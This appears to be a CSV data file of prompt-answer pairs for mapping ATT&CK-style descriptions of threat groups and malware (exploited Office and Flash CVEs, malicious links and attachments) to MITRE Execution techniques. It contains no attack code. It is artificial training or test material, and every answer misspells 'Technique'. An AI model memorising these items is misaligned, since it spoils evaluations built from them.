+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has exploited CVE-2017-0199 in Microsoft Word to execute code.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has exploited vulnerabilities in Microsoft PowerPoint via OLE objects (CVE-2014-4114) and Microsoft Word via crafted TIFF images (CVE-2013-3906).,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has exploited vulnerabilities to gain execution including CVE-2017-11882 and CVE-2020-0674.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA459 has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The White Company has taken advantage of a known vulnerability in Microsoft Word (CVE 2012-0158) to execute code.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has exploited CVE-2018-0798 in Equation Editor.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has exploited Microsoft vulnerabilities, including CVE-2018-0798, CVE-2018-8174, CVE-2018-0802, CVE-2017-11882, CVE-2019-9489 CVE-2020-8468, and CVE-2018-0798 to enable execution of their delivered malicious payloads.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: admin@338 has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims’ machines.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DealersChoice leverages vulnerable versions of Flash to perform execution.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAWKBALL has exploited Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802 to deliver the payload.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUPERNOVA was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148).,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT has relied on CVE-2022-30190 (Follina) for execution during delivery.,"Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution.","Tecnique: T1203 Exploitation for Client Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has recruited target organization employees or contractors who provide credentials and approve an associated MFA prompt, or install remote management software onto a corporate workstation, allowing LAPSUS$ to take control of an authenticated system.","Tecnique: T1204 User Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider has impersonated organization IT and helpdesk staff to instruct victims to execute commercial remote access tools to gain initial access.,"Tecnique: T1204 User Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0011, Transparent Tribe relied on student targets to click on a malicious link sent via email.","Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0021, the threat actors lured users into clicking a malicious link which led to the download of a ZIP archive containing a malicious .LNK file.","Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors enticed users to click on links in spearphishing emails to download malware.","Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group lured users into executing a malicious link to disclose private account information or provide initial access.","Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dust Storm, the threat actors relied on a victim clicking on a malicious link sent via email.","Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Spalax, the threat actors relied on a victim to click on a malicious link distributed via phishing emails.","Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used various forms of spearphishing attempting to get a user to click on a malicous link.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has lured victims into clicking malicious links delivered through spearphishing.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has lured users to click links to malicious HTML applications delivered via spearphishing emails.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious link.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has used e-mails with malicious links to lure victims into installing malware.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has lured victims into clicking on a malicious link sent through spearphishing.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has used malicious links to lure users into executing malicious payloads.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open links.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has attempted to lure users to click on a malicious link within a spearphishing email.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Evilnum has sent spearphishing emails designed to trick the recipient into opening malicious shortcut links which downloads a .LNK file.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN4 has lured victims to click malicious links delivered via spearphishing emails (often sent from compromised accounts).,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used malicious links to lure victims into downloading malware.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used emails with malicious links to lure victims into installing malware.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has lured victims into clicking malicious links.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has relied upon users clicking on links to malicious files.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has sent spearphishing email links attempting to get a user to click.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has lured victims into clicking malicious Dropbox download links delivered through spearphishing.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has has relied on users opening malicious links delivered through spearphishing to execute malware.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has attempted to lure victims into opening malicious links embedded in emails.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mofang's spearphishing emails required a user to click the link to connect to a compromised website.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats has sent malicious links via email trick users into opening a RAR archive and running an executable.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has distributed URLs in phishing e-mails that link to lure documents.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has sent malicious links including links directing victims to a Google Drive folder.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustard Tempest has lured users into downloading malware through malicious links in fake advertisements and spearphishing emails.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has delivered malicious links to achieve execution on the target system.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork has used spearphishing with links to try to get users to click, download and open malicious files.","Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has lured targets to click on malicious links to gain execution in the target environment.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used malicious links to cloud and web services to gain execution on victim machines.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used lures to get users to click links in emails and attachments. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files.","Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe has directed users to open URLs hosting malicious content.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used spearphishing via a link to get users to download and run their malware.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used links embedded in e-mails to lure victims into executing malicious code.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has lured victims into clicking a malicious link delivered through spearphishing.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used malicious links in e-mails to lure victims into downloading malware.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus's spearphishing links required user interaction to navigate to the malicious website.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has compromised victims via links to URLs hosting malicious content.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has relied upon a user downloading a file from a OneDrive link for execution.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has relied upon users clicking on a malicious link delivered through spearphishing.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro has used malicious links to gain execution on victim machines.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GuLoader has relied upon users clicking on links to malicious documents.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has relied upon users clicking on a malicious link delivered through phishing.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Javali has achieved execution through victims clicking links to malicious websites.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has relied on victims clicking on a malicious link delivered via email.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kerrdown has gained execution through victims opening malicious links.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Melcoz has gained execution through victims opening malicious links.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has been executed through convincing victims into clicking malicious links.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT has gained execution on targeted systems through luring users to click on links to malicious URLs.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel has relied on a user to click a malicious link within a spearphishing email.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD has been executed via malicious links in e-mails.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has attempted to lure targets into clicking links in spoofed emails from legitimate banks.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has gained execution through users opening malicious links.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has relied upon users clicking on a malicious link delivered through phishing.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has relied on users to click on a malicious link delivered via a spearphishing.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 has been executed through luring victims into clicking malicious links.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish has lured victims into interacting with malicious links on compromised websites for execution.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpicyOmelette has been executed through malicious links within spearphishing emails.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has relied on victims to click on a malicious link send via phishing campaigns.,"Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.","Tecnique: T1204.001 User Execution: Malicious Link, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team leveraged Microsoft Office attachments which contained malicious macros that were automatically executed once the user permitted them.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0011, Transparent Tribe relied on a student target to open a malicious document delivered via email.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors relied on users to enable macros within a malicious Microsoft Word document.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors relied on a victim to enable macros within a malicious Microsoft Word document likely sent via email.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group lured victims into executing malicious documents that contained ""dream job"" descriptions from defense, aerospace, and other sectors.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dust Storm, the threat actors relied on potential victims to open a malicious Microsoft Word document sent via email.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, threat actors relied on a victim to enable macros within a malicious Word document.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Sharpshooter, the threat actors relied on victims executing malicious Microsoft Word or PDF files.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Spalax, the threat actors relied on a victim to open a PDF document and click on an embedded malicious link to download malware.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT-C-36 has prompted victims to accept macros in order to execute the subsequent payload.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT12 has attempted to get victims to open malicious Microsoft Word and PDF attachment sent via spearphishing.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 attempted to get users to launch malicious attachments delivered via spearphishing emails.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 attempted to get users to click on Microsoft Office attachments containing malicious macro scripts.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used various forms of spearphishing attempting to get a user to open attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT30 has relied on users to execute malicious file attachments delivered via spearphishing emails.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used malicious e-mail attachments to lure victims into executing malware.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has sent spearphishing attachments attempting to get a user to open them.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has attempted to lure victims into enabling malicious macros within email attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious attachment.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ajax Security Team has lured victims into executing malicious files.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Andariel has attempted to lure victims into enabling malicious macros within email attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aoqin Dragon has lured victims into opening weaponized documents, fake external drives, and fake antivirus to execute malicious payloads.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has attempted to lure victims into opening malicious attachments delivered via spearphishing.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has used e-mails with malicious documents to lure victims into installing malware.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CURIUM has lured users into opening malicious files delivered via social media.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has lured victims to execute malicious attachments included in crafted spearphishing emails related to current topics.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dark Caracal makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkHydrus has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has sent spearphishing emails in an attempt to lure users into clicking on a malicious attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used various forms of spearphishing in attempts to get users to open malicious attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has gained execution through victims clicking on malicious LNK files contained within ISO files, which can execute hidden DLLs within the ISO.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca required users to click on a malicious file for the loader to activate.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has attempted to lure victims into executing malicious files.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
